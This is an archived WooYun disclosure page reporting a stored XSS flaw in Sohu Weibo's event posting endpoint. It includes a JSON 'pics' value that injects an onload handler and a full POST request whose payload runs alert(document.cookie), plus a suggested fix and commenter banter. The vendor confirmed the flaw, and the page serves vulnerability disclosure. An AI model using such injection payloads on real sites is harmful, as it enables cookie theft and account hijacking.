当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013232

漏洞标题:搜狐微博存储型XSS漏洞二

相关厂商:搜狐

漏洞作者: 心伤的胖子

提交时间:2012-10-11 08:46

修复时间:2012-11-25 08:46

公开时间:2012-11-25 08:46

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-11: 细节已通知厂商并且等待厂商处理中
2012-10-12: 厂商已经确认,细节仅向厂商公开
2012-10-22: 细节向核心白帽子及相关领域专家公开
2012-11-01: 细节向普通白帽子公开
2012-11-11: 细节向实习白帽子公开
2012-11-25: 细节向公众公开

简要描述:

之前提交的这个漏洞还没有修复,http://www.wooyun.org/bugs/wooyun-2012-012756。
同样的漏洞还存在其他的地方。

详细说明:

详细可以参考 WooYun: 搜狐微博存储型XSS漏洞 ,漏洞原理一样,只是接口不一样的。
这次出现的接口是为活动的发微博接口。
漏洞出现在pics参数中,输入和输出的时候都没有进行处理,造成漏洞出现。

pics=[{"url":"http://s2.t.itc.cn/x.jpg\" onload=\"alert(1)\" a=\"","extraData":{"smallest":{"w":119, "h":118, "size":3073},"small":{"w":160, "h":158, "size":3973},"middle":{"w":461, "h":456, "size":14283},"big":{"w":461, "h":456, "size":14283}}}]


如下的POST包内容可以重现漏洞

POST /event/apply HTTP/1.1
Host: t.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://t.sohu.com/event/44691
Content-Length: 18
Cookie: …………
Pragma: no-cache
Cache-Control: no-cache
aid=44691&pics=%5B%7B%22url%22%3A%22http%3A%2F%2Fs2.t.itc.cn%2Fx.jpg%5C%22+onload%3D%5C%22alert(document.cookie)%5C%22+a%3D%5C%22%22%2C%22extraData%22%3A%7B%22smallest%22%3A%7B%22w%22%3A119%2C+%22h%22%3A118%2C+%22size%22%3A3073%7D%2C%22small%22%3A%7B%22w%22%3A160%2C+%22h%22%3A158%2C+%22size%22%3A3973%7D%2C%22middle%22%3A%7B%22w%22%3A461%2C+%22h%22%3A456%2C+%22size%22%3A14283%7D%2C%22big%22%3A%7B%22w%22%3A461%2C+%22h%22%3A456%2C+%22size%22%3A14283%7D%7D%7D%5D&msg=test%20@aa%20@bb


漏洞证明:

看图

修复方案:

1、对传入的json数据显示的时候进行转义处理。

版权声明:转载请注明来源 心伤的胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-12 10:28

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2012-10-11 09:54 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    HI,马甲!

  2. 2012-10-11 10:41 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    举报楼上骂人。

  3. 2012-10-11 10:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @心伤的胖子 忽略不解释

  4. 2012-10-11 11:15 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @xsser 我在乌云的第一个"赞"献给你了!

  5. 2012-10-11 11:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @风萧萧 我代表搜狐说的

  6. 2012-10-11 11:18 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @xsser 我觉得也是,关键就看内部接口是如何处理的。坐等忽略。

  7. 2012-10-11 11:51 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    我猜会给个3-5分~

  8. 2012-10-11 11:58 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @goderci 上个就5分,说要补偿我呢,不知道这次咋样。

  9. 2012-10-12 13:41 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    @搜狐 20分,赞!碉堡的,坚持住。雄起~

  10. 2012-11-13 21:23 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    羡慕了,几百rank的洞主是什么概念~~